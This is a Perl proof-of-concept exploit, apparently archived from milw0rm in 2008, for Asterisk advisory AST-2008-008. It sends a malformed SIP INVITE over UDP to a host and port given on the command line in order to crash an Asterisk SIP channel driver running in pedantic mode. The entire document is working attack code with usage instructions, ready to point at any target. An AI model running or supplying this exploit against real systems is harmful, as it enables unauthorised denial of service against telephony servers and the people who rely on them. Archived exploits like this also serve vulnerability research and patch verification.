1 #!/usr/bin/perl −w
2 ###############
3
4
5 # asterisk AST−2008−008
6 # by armando.j.m.o@gmail.com
7 #AST−2008−008 − Remote Crash Vulnerability in SIP channel driver when run in pedantic mode
8
9 use Getopt::Std;
10 use IO::Socket;
11 use strict;
12
13 my %args;
14 getopts("h:p:", \%args);
15
16 if (!$args{h} || !$args{p}) { usage(); }
17
18
19 my $sock = IO::Socket::INET−>new(
20 Proto => ’udp’,
21 PeerPort => $args{p},
22 PeerAddr => $args{h},
23 ) or die "Could not create socket: $!\n";
24
25 $sock−>send(’INVITE sip:1234@’.$args{h}.’ SIP/2.0\n
26 CSeq: 2 INVITE’) or die "Send error: $!\n";
27
28
29
30
31 sub usage {
32 print STDERR
33 qq{ $0
34
35 Usage: $0 −h <host> −p <port>
36 −h <host> = host
37 −p <port> = port
38
39 Example:
40 $0 −h target −p port
41
42
43 };
44
45 # milw0rm.com [2008−06−05]
Page 1/1
Asterisk SIP channel driver in pedantic mode Remote Crash Exploit
Armando Oliveira
06/05/2008